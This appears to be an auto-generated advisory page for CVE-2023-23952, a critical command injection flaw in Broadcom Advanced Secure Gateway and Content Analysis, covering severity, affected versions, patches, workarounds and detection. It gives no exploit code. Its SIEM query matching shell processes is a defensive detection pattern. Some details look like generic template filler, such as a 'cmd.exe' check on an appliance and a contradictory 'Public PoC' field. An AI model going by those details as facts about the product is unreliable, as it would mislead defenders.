CVE-2023-23952 – This CVE describes a command injection vulnerab... (How to Fix)

Q: What is the severity of CVE-2023-23952?

CVE-2023-23952 has a CVSS score of 9.8 (CRITICAL). This CVE describes a command injection vulnerability in Broadcom's Advanced Secure Gateway and Content Analysis products. Attackers can execute arbitrary commands on affected systems by injecting malicious input. Organizations running vulnerable versions of these security appliances are affected.

📋 TL;DR

This CVE describes a command injection vulnerability in Broadcom's Advanced Secure Gateway and Content Analysis products. Attackers can execute arbitrary commands on affected systems by injecting malicious input. Organizations running vulnerable versions of these security appliances are affected.

💻 Affected Systems

Products:

Advanced Secure Gateway
Content Analysis

Versions: Prior to 7.3.13.1 for Advanced Secure Gateway, prior to 3.1.6.0 for Content Analysis

Operating Systems: Appliance OS

Default Config Vulnerable: ⚠️ Yes

Notes: Affects default configurations of these security appliances.

📦 What is this software?

Advanced Secure Gateway by Broadcom

View all CVEs affecting Advanced Secure Gateway →

Content Analysis by Broadcom

View all CVEs affecting Content Analysis →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise allowing attackers to execute arbitrary commands with high privileges, potentially leading to data theft, lateral movement, or complete system takeover.

🟠

Likely Case

Remote code execution allowing attackers to gain shell access, install malware, or pivot to internal networks.

🟢

If Mitigated

Limited impact if proper input validation and command sanitization are implemented, though some functionality may be disrupted.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Command injection vulnerabilities typically have low exploitation complexity when unauthenticated access is possible.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.3.13.1 for Advanced Secure Gateway, 3.1.6.0 for Content Analysis

Vendor Advisory: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/22217

Restart Required: Yes

Instructions:

1. Download the appropriate patch from Broadcom support portal. 2. Backup current configuration. 3. Apply the patch following vendor instructions. 4. Restart the appliance. 5. Verify successful update.

🔧 Temporary Workarounds

Network Segmentation

all

Restrict network access to vulnerable appliances to only trusted sources.

Input Validation Rules

all

Implement strict input validation on all user-controlled parameters if appliance supports custom rules.

🧯 If You Can't Patch

Isolate affected systems from internet and restrict internal access
Implement network monitoring and intrusion detection for command injection patterns

🔍 How to Verify

Check if Vulnerable:

Check appliance version via web interface or CLI: show version

Check Version:

show version

Verify Fix Applied:

Verify version is 7.3.13.1 or higher for ASG, 3.1.6.0 or higher for Content Analysis

📡 Detection & Monitoring

Log Indicators:

Unusual command execution patterns
Suspicious process creation
Failed authentication attempts followed by command execution

Network Indicators:

Unexpected outbound connections from appliance
Command and control traffic patterns

SIEM Query:

source="asg_appliance" AND (process="cmd.exe" OR process="/bin/sh" OR command_injection_patterns)

📊 Metadata

CVE ID: CVE-2023-23952

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-77

Published: June 1, 2023

Last Updated: January 9, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-23952, you might also want to check these: